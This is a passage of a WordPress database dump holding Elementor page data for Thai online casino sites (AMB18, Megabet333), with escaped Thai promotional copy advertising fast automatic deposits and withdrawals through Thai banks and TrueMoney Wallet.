\\u0e41\\u0e25\\u0e30\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e2d\\u0e32\\u0e22\\u0e38 18 \\u0e1b\\u0e35\\u0e02\\u0e36\\u0e49\\u0e19\\u0e44\\u0e1b \\u0e40\\u0e1e\\u0e37\\u0e48\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e34\\u0e14\\u0e0a\\u0e2d\\u0e1a<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"11898c9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/3icon-AMB18.webp\",\"id\":345,\"size\":\"\",\"alt\":\"\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1741422\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e17\\u0e33\\u0e44\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e32\\u0e2a\\u0e34\\u0e42\\u0e19\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c AMB18 \\u0e16\\u0e36\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9b3a68\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"2289\\\" data-end=\\\"2531\\\">\\u0e2a\\u0e34\\u0e48\\u0e07\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49 <b>AMB18\\u00a0<\\/b>\\u0e42\\u0e14\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e40\\u0e2b\\u0e19\\u0e37\\u0e2d\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2d\\u0e37\\u0e48\\u0e19 \\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35 <strong data-start=\\\"2353\\\" data-end=\\\"2380\\\">Auto Transaction System<\\/strong> \\u0e17\\u0e35\\u0e48\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e41\\u0e25\\u0e30\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e27\\u0e2d\\u0e40\\u0e25\\u0e17\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22 \\u0e0b\\u0e36\\u0e48\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49\\u0e16\\u0e39\\u0e01\\u0e19\\u0e33\\u0e40\\u0e02\\u0e49\\u0e32\\u0e08\\u0e32\\u0e01 USA \\u0e41\\u0e25\\u0e30\\u0e44\\u0e14\\u0e49\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e41\\u0e15\\u0e48\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e43\\u0e0a\\u0e49\\u0e07\\u0e32\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e17\\u0e22\\u0e42\\u0e14\\u0e22\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30<\\/p><p data-start=\\\"2533\\\" data-end=\\\"2575\\\"><span style=\\\"text-decoration: underline;\\\"><strong>\\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e02\\u0e2d\\u0e07\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u00a0<\\/strong><\\/span><b><u>AMB18<\\/u><\\/b><\\/p><ul><li data-start=\\\"2578\\\" data-end=\\\"2668\\\"><strong data-start=\\\"2578\\\" data-end=\\\"2617\\\">\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07\\u0e01\\u0e31\\u0e1a\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e17\\u0e38\\u0e01\\u0e41\\u0e2b\\u0e48\\u0e07<\\/strong> \\u0e40\\u0e0a\\u0e48\\u0e19 \\u0e01\\u0e2a\\u0e34\\u0e01\\u0e23\\u0e44\\u0e17\\u0e22, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e40\\u0e17\\u0e1e, \\u0e44\\u0e17\\u0e22\\u0e1e\\u0e32\\u0e13\\u0e34\\u0e0a\\u0e22\\u0e4c, \\u0e01\\u0e23\\u0e38\\u0e07\\u0e28\\u0e23\\u0e35\\u0e2f \\u0e2f\\u0e25\\u0e2f<\\/li><li data-start=\\\"2671\\\" data-end=\\\"2753\\\"><strong data-start=\\\"2671\\\" data-end=\\\"2707\\\">\\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a TrueMoney Wallet \\u0e40\\u0e15\\u0e47\\u0e21\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/strong> \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e2a\\u0e33\\u0e2b\\u0e23\\u0e31\\u0e1a\\u0e1c\\u0e39\\u0e49\\u0e40\\u0e25\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01\\u0e43\\u0e0a\\u0e49\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23<\\/li><li data-start=\\\"2756\\\" data-end=\\\"2796\\\"><strong data-start=\\\"2756\\\" data-end=\\\"2794\\\">\\u0e15\\u0e23\\u0e27\\u0e08\\u0e08\\u0e31\\u0e1a\\u0e22\\u0e2d\\u0e14\\u0e1d\\u0e32\\u0e01\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35\\u0e14\\u0e49\\u0e27\\u0e22 AI \\u0e2d\\u0e31\\u0e08\\u0e09\\u0e23\\u0e34\\u0e22\\u0e30<\\/strong><\\/li><li data-start=\\\"2799\\\" data-end=\\\"2866\\\"><strong data-start=\\\"2799\\\" data-end=\\\"2840\\\">\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e2a\\u0e39\\u0e07\\u0e2a\\u0e38\\u0e14\\u0e41\\u0e1a\\u0e1a 2 \\u0e0a\\u0e31\\u0e49\\u0e19 (2FA)<\\/strong> \\u0e1b\\u0e49\\u0e2d\\u0e07\\u0e01\\u0e31\\u0e19\\u0e01\\u0e32\\u0e23\\u0e42\\u0e08\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25<\\/li><li data-start=\\\"2869\\\" data-end=\\\"2919\\\"><strong data-start=\\\"2869\\\" data-end=\\\"2903\\\">\\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e15\\u0e48\\u0e2d\\u0e23\\u0e32\\u0e22\\u0e01\\u0e32\\u0e23<\\/strong> \\u0e17\\u0e31\\u0e49\\u0e07\\u0e1d\\u0e32\\u0e01\\u0e41\\u0e25\\u0e30\\u0e16\\u0e2d\\u0e19<\\/li><\\/ul><blockquote><p style=\\\"text-align: center;\\\" data-start=\\\"2921\\\" data-end=\\\"3018\\\"><em><span style=\\\"color: #ffcc00;\\\"><b>\\u0e14\\u0e49\\u0e27\\u0e22\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e19\\u0e35\\u0e49 AMB18 \\u0e08\\u0e36\\u0e07\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e1e\\u0e19\\u0e31\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e31\\u0e49\\u0e07 \\u201c\\u0e40\\u0e23\\u0e47\\u0e27\\u201d \\u0e41\\u0e25\\u0e30 \\u201c\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u201d \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e40\\u0e17\\u0e28\\u0e44\\u0e17\\u0e22\\u0e43\\u0e19\\u0e02\\u0e13\\u0e30\\u0e19\\u0e35\\u0e49<\\/b><\\/span><\\/em><\\/p><\\/blockquote>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(809,112,'_elementor_edit_mode','builder'),(810,112,'_elementor_template_type','wp-page'),(811,112,'_elementor_version','3.32.5'),(812,112,'_elementor_pro_version','3.32.3'),(813,112,'_wp_page_template','default'),(814,112,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(815,112,'_elementor_data','[]'),(817,113,'_elementor_edit_mode','builder'),(818,113,'_elementor_template_type','wp-page'),(819,113,'_elementor_version','3.32.5'),(820,113,'_elementor_pro_version','3.32.3'),(821,113,'_wp_page_template','default'),(822,113,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(823,113,'_elementor_data','[]'),(825,114,'_elementor_edit_mode','builder'),(826,114,'_elementor_template_type','wp-page'),(827,114,'_elementor_version','3.32.5'),(828,114,'_elementor_pro_version','3.32.3'),(829,114,'_wp_page_template','default'),(830,114,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(831,114,'_elementor_data','[]'),(834,115,'_elementor_edit_mode','builder'),(835,115,'_elementor_template_type','wp-page'),(836,115,'_elementor_version','3.32.5'),(837,115,'_elementor_pro_version','3.32.3'),(838,115,'_wp_page_template','default'),(839,115,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(840,115,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(845,116,'_elementor_edit_mode','builder'),(846,116,'_elementor_template_type','wp-page'),(847,116,'_elementor_version','3.32.5'),(848,116,'_elementor_pro_version','3.32.3'),(849,116,'_wp_page_template','default'),(850,116,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(851,116,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(854,117,'_elementor_edit_mode','builder'),(855,117,'_elementor_template_type','wp-page'),(856,117,'_elementor_version','3.32.5'),(857,117,'_elementor_pro_version','3.32.3'),(858,117,'_wp_page_template','default'),(859,117,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(860,117,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(863,118,'_elementor_edit_mode','builder'),(864,118,'_elementor_template_type','wp-page'),(865,118,'_elementor_version','3.32.5'),(866,118,'_elementor_pro_version','3.32.3'),(867,118,'_wp_page_template','default'),(868,118,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(869,118,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"355\\\" data-end=\\\"698\\\">\\u0e43\\u0e19\\u0e22\\u0e38\\u0e04\\u0e19\\u0e35\\u0e49 2025 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e22\\u0e38\\u0e04\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e40\\u0e25\\u0e22\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32 \\u0e22\\u0e38\\u0e04\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 megabet\\u00a0\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22\\u0e40\\u0e0a\\u0e48\\u0e19\\u0e01\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e2b\\u0e19\\u0e36\\u0e48\\u0e07\\u0e43\\u0e19\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e01\\u0e32\\u0e23\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e02\\u0e2d\\u0e07\\u0e19\\u0e31\\u0e01\\u0e40\\u0e14\\u0e34\\u0e21\\u0e1e\\u0e31\\u0e19\\u0e44\\u0e17\\u0e22\\u0e44\\u0e1b\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e2a\\u0e34\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07\\u0e01\\u0e47\\u0e04\\u0e37\\u0e2d \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49\\u0e08\\u0e32\\u0e01\\u0e40\\u0e27\\u0e47\\u0e1a Megabet333 \\u0e17\\u0e35\\u0e48\\u0e02\\u0e36\\u0e49\\u0e19\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e27\\u0e48\\u0e32\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e43\\u0e0a\\u0e49\\u0e40\\u0e27\\u0e25\\u0e32\\u0e40\\u0e1e\\u0e35\\u0e22\\u0e07 5 \\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e40\\u0e17\\u0e48\\u0e32\\u0e19\\u0e31\\u0e49\\u0e19 \\u0e40\\u0e07\\u0e34\\u0e19\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e1a\\u0e31\\u0e0d\\u0e0a\\u0e35\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e41\\u0e2d\\u0e14\\u0e21\\u0e34\\u0e19 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e2a\\u0e48\\u0e07\\u0e2a\\u0e25\\u0e34\\u0e1b\\u0e43\\u0e2b\\u0e49\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e2d\\u0e35\\u0e01\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e1b \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e21\\u0e01\\u0e49\\u0e32\\u0e40\\u0e1a\\u0e17\\u0e16\\u0e37\\u0e2d\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1c\\u0e39\\u0e49\\u0e19\\u0e33\\u0e14\\u0e49\\u0e32\\u0e19\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e2d\\u0e31\\u0e15\\u0e42\\u0e19\\u0e21\\u0e31\\u0e15\\u0e34\\u0e43\\u0e19\\u0e27\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2d\\u0e2d\\u0e19\\u0e44\\u0e25\\u0e19\\u0e4c \\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e41\\u0e1e\\u0e25\\u0e15\\u0e1f\\u0e2d\\u0e23\\u0e4c\\u0e21\\u0e40\\u0e0a\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e15\\u0e48\\u0e2d\\u0e01\\u0e31\\u0e1a API \\u0e08\\u0e32\\u0e01\\u0e1c\\u0e39\\u0e49\\u0e43\\u0e2b\\u0e49\\u0e1a\\u0e23\\u0e34\\u0e01\\u0e32\\u0e23\\u0e18\\u0e19\\u0e32\\u0e04\\u0e32\\u0e23\\u0e42\\u0e14\\u0e22\\u0e15\\u0e23\\u0e07 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e35\\u0e22\\u0e25\\u0e44\\u0e17\\u0e21\\u0e4c \\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22 \\u0e41\\u0e25\\u0e30\\u0e41\\u0e21\\u0e48\\u0e19\\u0e22\\u0e33 100% \\u0e44\\u0e21\\u0e48\\u0e27\\u0e48\\u0e32\\u0e04\\u0e38\\u0e13\\u0e08\\u0e30\\u0e1d\\u0e32\\u0e01\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e2a\\u0e34\\u0e1a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e16\\u0e2d\\u0e19\\u0e2b\\u0e25\\u0e31\\u0e01\\u0e41\\u0e2a\\u0e19 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e01\\u0e47\\u0e1b\\u0e23\\u0e30\\u0e21\\u0e27\\u0e25\\u0e1c\\u0e25\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e43\\u0e2b\\u0e49\\u0e04\\u0e38\\u0e13\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e44\\u0e14\\u0e49\\u0e15\\u0e48\\u0e2d\\u0e40\\u0e19\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(874,119,'_elementor_edit_mode','builder'),(875,119,'_elementor_template_type','wp-page'),(876,119,'_elementor_version','3.32.5'),(877,119,'_elementor_pro_version','3.32.3'),(878,119,'_wp_page_template','default'),(879,119,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(880,119,'_elementor_data','[{\"id\":\"3ffd0d3\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"e0d3c94\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"70ef781\",\"elType\":\"widget\",\"settings\":{\"title\":\"Megabet333 \\u0e1d\\u0e32\\u0e01\\u0e16\\u0e2d\\u0e19\\u0e2d\\u0e2d\\u0e42\\u0e15\\u0e49 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e23\\u0e47\\u0e27\\u0e2a\\u0e38\\u0e14\\u0e43\\u0e19\\u0e44\\u0e17\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 5 \\u0e27\\u0e34\\u0e40\\u0e07\\u0e34\\u0e19\\u0e40\\u0e02\\u0e49\\u0e32\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"0cb3fb0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p data-start=\\\"355\\\" data-end=\\\"698\\\">\\u0e43\\u0e19\\u0e22\\u0e38\\u0e04\\u0e19\\u0e35\\u0e49 2025 \\u0e40\\u0e23\\u0e35\\u0e22\\u0e19\\u0e01\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e22\\u0e38\\u0e04\\u0e41\\u0e2b\\u0e48\\u0e07\\u0e40\\u0e17\\u0e04\\u0e42\\u0e19\\u0e42\\u0e25\\u0e22\\u0e35\\u0e40\\u0e25\\u0e22\\u0e01\\u0e47\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32 \\u0e22\\u0e38\\u0e04\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e23\\u0e47\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e30\\u0e14\\u0e27\\u0e01 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e15\\u0e23\\u0e07 megabet\\u00a0\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1b\\u0e23\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e22\\u0e40\\u0e0a\\u0e48\\u0e19\\u0e01\\u0e31\\u0e19 